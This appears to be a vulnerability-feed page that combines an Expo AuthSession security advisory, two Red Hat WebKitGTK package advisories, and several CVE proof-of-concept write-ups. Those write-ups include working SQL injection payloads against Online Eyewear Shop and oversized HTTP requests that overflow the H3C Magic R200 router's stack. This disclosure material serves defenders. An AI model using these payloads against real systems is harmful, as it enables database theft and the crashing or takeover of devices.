A vulnerability in the expo.io framework allows an attacker to take over accounts and steal credentials on an application/website that configured the "Expo AuthSession Redirect Proxy" for social sign-in. This can be achieved once a victim clicks a malicious link. The link itself may be sent to the victim in various ways (including email, text message, an attacker-controlled website, etc).

**Migrate from useProxy, deprecated as of SDK 48, to using your app’s own links directly. While there is no urgent issue, this migration improves security and reliability.**

Today, we are recommending developers using the AuthSession module’s useProxy options to migrate to using deep links with third-party authentication providers directly, which is more secure and reliable. The reason for this change is two-fold.

Firstly, security researchers at Salt Labs let us know last Friday about a potential vulnerability with the AuthSession proxy (auth.expo.io). This issue was fixed within a few hours of the report and we found no evidence of a breach. There is no urgent need to migrate. However, we believe it is more secure for apps to directly register their own links with third-party auth providers, rather than to use an intermediate service.

Secondly, direct links have been more reliable than the auth session proxy due to how browsers have changed their cookie policies over the past few years, which sometimes caused end users with strict browser settings to be unable to log in with third-party auth providers. For these two reasons, we have deprecated the AuthSession module’s useProxy options in SDK 48, as well as the auth.expo.io service.

**Security**

The vulnerability reported by Salt Labs has been mitigated and there is no urgent need to migrate. We deployed a hotfix a few hours after learning about the issue.

The vulnerability would have allowed a potential attacker to trick a user into visiting a malicious link, logging in to a third-party auth provider, and inadvertently revealing their third-party auth credentials. This was because auth.expo.io used to store an app’s callback URL before the user explicitly confirmed they trust the callback URL. After the hotfix, auth.expo.io now requires users to confirm they trust unverified callback URLs. In addition to mitigating the issue, we analyzed our access logs and to the best of our knowledge believe there has been no breach and this vulnerability was never exploited.

However, we recommend developers migrate to using their app’s own links directly. While the surface area of auth.expo.io is small, the surface area of using no intermediate service is even smaller. And, as previously mentioned, direct links also work more reliably on devices with stricter browser configurations.

**Reliability**

Due to web browser changes like WebKit’s Tracking Prevention, the AuthSession proxy service may not work reliably in edge cases such as when a user’s device is configured to block cookies or prevent cross-site tracking. The AuthSession proxy service does not track nor collect any user data but it requires cookies to correctly redirect back to your app after the user has authenticated with the third-party auth provider. The proxy also does not work if the browser’s settings or heuristics block cookies. In contrast, configuring a third-party authentication provider to redirect directly to your app’s deep link does not have these issues.

**Migration steps**

Follow this migration guide to learn how to switch from using useProxy and auth.expo.io to using your app’s own links. If you are using Expo Go to develop, you will need to create a development build of your own app in order to customize your deep link URL schemes.

**Questions**

Let us know how we can help by reaching out to us on Discord or through the website.

CVE-2023-28131: Security advisory for developers using AuthSession’s “useProxy” options and auth.expo.io

A vulnerability was found in SourceCodester Online Eyewear Shop 1.0. It has been classified as critical. This affects an unknown part of the file /admin/orders/update_status.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227229 was assigned to this vulnerability.

**Online Eyewear Shop v1.0 has SQL injection**

BUG\_Author: T4y1oR

Website source code address:https://www.sourcecodester.com/php/16089/online-eyewear-shop-website-using-php-and-mysql-free-download.html

Vulnerability File: /oews/admin/orders/update\_status.php

GET parameter 'id' exists SQL injection vulnerability

Payload1:id=1' union all select concat(0x515253,0x66676869,0x717273),null,null,null,null,null,null,null-- -

    GET /oews/admin/orders/update_status.php?id=1%27%20union%20all%20select%20concat(0x515253,0x66676869,0x717273),null,null,null,null,null,null,null--%20- HTTP/1.1
    Host: localhost
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: revenue[LastUrl]=%2Frates%2Fadmin%2Fsystem_settingslist.php; PHPSESSID=i6hni6v878818jfsm3ur8n792s
    Connection: close
    

union query success

Payload2:id=1' and (select 2 from (select(sleep(20)))d)-- x

    GET /oews/admin/orders/update_status.php?id=1%27%20and%20(select%202%20from%20(select(sleep(20)))d)--%20x HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: revenue[LastUrl]=%2Frates%2Fadmin%2Fsystem_settingslist.php; PHPSESSID=i6hni6v878818jfsm3ur8n792s
    Connection: close
    

The server's response time is 20 seconds

CVE-2023-2244: bug_report/SQLi-1.md at main · T4y1oR/bug_report

Red Hat Security Advisory 2023-1919-01 - WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform. Issues addressed include code execution and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: webkit2gtk3 security update  
Advisory ID:       RHSA-2023:1919-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1919  
Issue date:        2023-04-20  
CVE Names:         CVE-2023-28205   
=====================================================================

1. Summary:

An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

WebKitGTK is the port of the portable web rendering engine WebKit to the  
GTK platform.

Security Fix(es):

* WebKitGTK: use-after-free leads to arbitrary code execution  
(CVE-2023-28205)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2185724 - CVE-2023-28205 WebKitGTK: use-after-free leads to arbitrary code execution

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
webkit2gtk3-2.36.7-1.el8_7.3.src.rpm

aarch64:  
webkit2gtk3-2.36.7-1.el8_7.3.aarch64.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_7.3.aarch64.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_7.3.aarch64.rpm  
webkit2gtk3-devel-2.36.7-1.el8_7.3.aarch64.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_7.3.aarch64.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_7.3.aarch64.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_7.3.aarch64.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_7.3.aarch64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_7.3.aarch64.rpm

ppc64le:  
webkit2gtk3-2.36.7-1.el8_7.3.ppc64le.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_7.3.ppc64le.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_7.3.ppc64le.rpm  
webkit2gtk3-devel-2.36.7-1.el8_7.3.ppc64le.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_7.3.ppc64le.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_7.3.ppc64le.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_7.3.ppc64le.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_7.3.ppc64le.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_7.3.ppc64le.rpm

s390x:  
webkit2gtk3-2.36.7-1.el8_7.3.s390x.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_7.3.s390x.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_7.3.s390x.rpm  
webkit2gtk3-devel-2.36.7-1.el8_7.3.s390x.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_7.3.s390x.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_7.3.s390x.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_7.3.s390x.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_7.3.s390x.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_7.3.s390x.rpm

x86_64:  
webkit2gtk3-2.36.7-1.el8_7.3.i686.rpm  
webkit2gtk3-2.36.7-1.el8_7.3.x86_64.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_7.3.i686.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_7.3.x86_64.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_7.3.i686.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_7.3.x86_64.rpm  
webkit2gtk3-devel-2.36.7-1.el8_7.3.i686.rpm  
webkit2gtk3-devel-2.36.7-1.el8_7.3.x86_64.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_7.3.i686.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_7.3.x86_64.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_7.3.i686.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_7.3.x86_64.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_7.3.i686.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_7.3.x86_64.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_7.3.i686.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_7.3.x86_64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_7.3.i686.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_7.3.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-28205  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEGgpdzjgjWX9erEAQgUjA/9GvTg0OjMXhVUv5AF6hVj25NeVl1lrejR  
Zwzd/dvchjpT8bqLZhAKQs3REFtO9vVRcEt6OWEhcDY24iwE9Icpsg4gNsypZPOr  
e/o1WKNkDlyprHKtR0wQWuIqNnvIlYDChBpJIStS+nQix7Re9AKnBzXG0SNJsZP+  
0+3UV8OtGvJAmWJfpOH52JoSqAp9y8+eKxRkcHWhe843o+EiIwZR8GD5sedElw0b  
Oalmfse5clwSa5syXcr6yWVfrYBusxT3XIcSnEvu6QV8kuJJbwiWbdM+1ydLuYxg  
0OmarVvHTWMT+LVQr0glvADQaN1oZBKVg5OVRSc0ZnG+hvwnq/cK4GsBfFvegY2b  
UPyFnmJphETdVp9bNCtFBU3rtaVLjcWh0Y5PBRymIlxgDmji04IsJgK0HGwwrS8M  
jxKkw03g16DKWg7lleO76jlr30vsGXzqMKMSqjSNLhUKu6FbFdR/pJcXLaALzEXA  
S/AqUzJFuJp3cL1x6OBjFVwr38E9ElkQC9MSKV0JeoeOPCgY1Lew0JjoUAjcLR+M  
V17lpBY6b+E5kASDMWApUqunkjWsDg8abyFSyHeoMaxLx5QhIWmJuHLe0rtWfuEM  
zKO63TQXfVuqKma3yfWuwee5RqUpo5GplwWXH35qbJhUh8V63liXtXrTsu2F8uxx  
Lr20GwzdjN0=  
=wPFl  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1919-01

Red Hat Security Advisory 2023-1918-01 - WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform. Issues addressed include code execution and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: webkit2gtk3 security update  
Advisory ID:       RHSA-2023:1918-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1918  
Issue date:        2023-04-20  
CVE Names:         CVE-2023-28205   
=====================================================================

1. Summary:

An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

WebKitGTK is the port of the portable web rendering engine WebKit to the  
GTK platform.

Security Fix(es):

* WebKitGTK: use-after-free leads to arbitrary code execution  
(CVE-2023-28205)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2185724 - CVE-2023-28205 WebKitGTK: use-after-free leads to arbitrary code execution

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
webkit2gtk3-2.36.7-1.el9_1.3.src.rpm

aarch64:  
webkit2gtk3-2.36.7-1.el9_1.3.aarch64.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el9_1.3.aarch64.rpm  
webkit2gtk3-debugsource-2.36.7-1.el9_1.3.aarch64.rpm  
webkit2gtk3-devel-2.36.7-1.el9_1.3.aarch64.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el9_1.3.aarch64.rpm  
webkit2gtk3-jsc-2.36.7-1.el9_1.3.aarch64.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_1.3.aarch64.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3.aarch64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_1.3.aarch64.rpm

ppc64le:  
webkit2gtk3-2.36.7-1.el9_1.3.ppc64le.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el9_1.3.ppc64le.rpm  
webkit2gtk3-debugsource-2.36.7-1.el9_1.3.ppc64le.rpm  
webkit2gtk3-devel-2.36.7-1.el9_1.3.ppc64le.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el9_1.3.ppc64le.rpm  
webkit2gtk3-jsc-2.36.7-1.el9_1.3.ppc64le.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_1.3.ppc64le.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3.ppc64le.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_1.3.ppc64le.rpm

s390x:  
webkit2gtk3-2.36.7-1.el9_1.3.s390x.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el9_1.3.s390x.rpm  
webkit2gtk3-debugsource-2.36.7-1.el9_1.3.s390x.rpm  
webkit2gtk3-devel-2.36.7-1.el9_1.3.s390x.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el9_1.3.s390x.rpm  
webkit2gtk3-jsc-2.36.7-1.el9_1.3.s390x.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_1.3.s390x.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3.s390x.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_1.3.s390x.rpm

x86_64:  
webkit2gtk3-2.36.7-1.el9_1.3.i686.rpm  
webkit2gtk3-2.36.7-1.el9_1.3.x86_64.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el9_1.3.i686.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el9_1.3.x86_64.rpm  
webkit2gtk3-debugsource-2.36.7-1.el9_1.3.i686.rpm  
webkit2gtk3-debugsource-2.36.7-1.el9_1.3.x86_64.rpm  
webkit2gtk3-devel-2.36.7-1.el9_1.3.i686.rpm  
webkit2gtk3-devel-2.36.7-1.el9_1.3.x86_64.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el9_1.3.i686.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el9_1.3.x86_64.rpm  
webkit2gtk3-jsc-2.36.7-1.el9_1.3.i686.rpm  
webkit2gtk3-jsc-2.36.7-1.el9_1.3.x86_64.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_1.3.i686.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_1.3.x86_64.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3.i686.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3.x86_64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_1.3.i686.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_1.3.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-28205  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEGgmdzjgjWX9erEAQi06Q/9GQC0R4zJg84qKELW972t3dpQMX4djnuK  
5TKnsEBPT3PH3R8yRdQTlxdGP9shDJe5OvJROF1olLczpo2kgoaI4tyW+UcRHPvi  
hQkoKv+PbY/pxyZHj+GFo6laoTHsvGp29m5KC6W8djsvxR+Iwdhzaim/WJMl5JvR  
MmmwUOd+An+4zk61wKuT4vEJWh3P+oyieO4bbSIUh5GOYNwuCcgYNtuLcw6ar1AM  
r6INmhZ5AzEJNLiSc0AYjXolDhv+sKQ6aCZ6k4QudlCPCOLvlbIECda70hWP+UbX  
O3dTXjH4bCwiv+OwhMc6fQbAcL1HCuVYbzsvwfSsh/iYTZfn5KgnIjhG3xANnyu9  
izEimPb0sklj0ubdEe/VuqOF4y/pZWkrzoXUnxFg+vVDplGtV94EobL8C/uHwjEI  
lzZahd3DITpDmA2vr6McP+TrZk5QUGvVgubBr6/RSlZOZzy7odifK6R2Nb9KWPHr  
uoYviORBRTKa15d2F86jlrdeWKVFC/uIEw85FBtfN+TiigbtonDp6scmwcznZEU9  
zAkM4hlS6tx5yYjky+RuxkgdFkL7J1q6/PqIJ2+TBVKiU+X78s4W1ITOs/5eBo7T  
uiCac2y7DkqP8vJoAMAmnavi1gOepZ9d/DeBwBY1Fa2pr1cdS8yhy546a51cMhLj  
FVsDcrY98uo=  
=SSir  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1918-01

H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the Edit_BasicSSID interface at /goform/aspForm.

\# H3C Magic R200 was discovered stack overflow via the Edit\_BasicSSID interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R200\` vendor:H3C product:Magic R200 version:R200V100R004 type:Stack Overflow author:Wolin Zhuang, Yifeng Li; ## Vulnerability Description H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the Edit\_BasicSSID interface at /goform/aspForm. ## Vulnerability Details In function Edit\_BasicSSID, string Var is passed in by parameter 'param' without filtered and checking its length. Local varible v45 is 64 bytes long. in line 57, the content of Var is formatted into v45 without size check by sscanf function in the form of \`%\[^;\]\`, which leads to a stack overflow vulnerbility. !\[\](https://i.imgur.com/2LBQDtp.png) !\[\](https://i.imgur.com/o2fBFuD.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R200 to newest version(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/Gh5mBRc.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 536 CMD=Edit\_BasicSSID&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to denial of service. !\[\](https://i.imgur.com/ZGgxQ90.png) We can see process webs is crashed and restarted. !\[\](https://i.imgur.com/Ap2kSe4.png) And you can write your own exp to get the root shell.

CVE-2023-29906: H3C Magic R200 was discovered stack overflow via the Edit_BasicSSID interface at /goform/aspForm - HackMD

H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the UpdateSnat interface at /goform/aspForm.

\# H3C Magic R200 was discovered stack overflow via the UpdateSnat interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R200\` vendor:H3C product:Magic R200 version:R200V100R004 type:Stack Overflow author:Wolin Zhuang, Yifeng Li; ## Vulnerability Description H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the UpdateSnat interface at /goform/aspForm. ## Vulnerability Details In function UpdateSnat, string Var is passed in by parameter 'param' without filtered and checking its length. Local varible v14 is 64 bytes long. When the length of Var is less than 512 and larger than 64, in line 24, the content of Var is formatted into v14 by sscanf function in the form of \`%s\`, which leads to a stack overflow vulnerbility. !\[\](https://i.imgur.com/QVP8iPa.png) !\[\](https://i.imgur.com/jokv0qU.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R200 to newest version(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/Gh5mBRc.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 534 CMD=UpdateSnat&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to denial of service. !\[\](https://i.imgur.com/D5hCz0Z.png) And you can write your own exp to get the root shell.

CVE-2023-29905: H3C Magic R200 was discovered stack overflow via the UpdateSnat interface at /goform/aspForm - HackMD

H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the UpdateMacClone interface at /goform/aspForm.

\# H3C Magic R200 was discovered stack overflow via the UpdateMacClone interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R200\` vendor:H3C product:Magic R200 version:R200V100R004 type:Stack Overflow author:Wolin Zhuang, Yifeng Li; ## Vulnerability Description H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the UpdateMacClone interface at /goform/aspForm. ## Vulnerability Details In function UpdateMacClone, string Var is passed in by parameter 'param' without filtered and checking its length. Local varible v15 is 64 bytes long. When the length of Var is less than 512 and larger than 64, in line 25, the content of Var is formatted into v15 by sscanf function in the form of \`%s\`, which leads to a stack overflow vulnerbility. !\[\](https://i.imgur.com/xgbkTHn.png) !\[\](https://i.imgur.com/JE4Nozu.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R200 to newest version(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/Gh5mBRc.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Content-Length: 524 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Content-Type: text/plain;charset=UTF-8 Accept: \*/\* Origin: http://192.168.124.1 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG=; cur\_page=maintain\_logs.asp?refreshFlag=Tue%20Mar%2014%202023%2016:05:37%20GMT+0800%20(%D0%C2%BC%D3%C6%C2%B1%EA%D7%BC%CA%B1%BC%E4) Connection: close CMD=UpdateMacClone&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to denial of service. !\[\](https://i.imgur.com/mbrGAKz.png) And you can write your own exp to get the root shell.

CVE-2023-29910: H3C Magic R200 was discovered stack overflow via the UpdateMacClone interface at /goform/aspForm - HackMD

H3C Magic R200 R200V100R004 was discovered to contain a stack overflow via the DelvsList interface at /goform/aspForm.

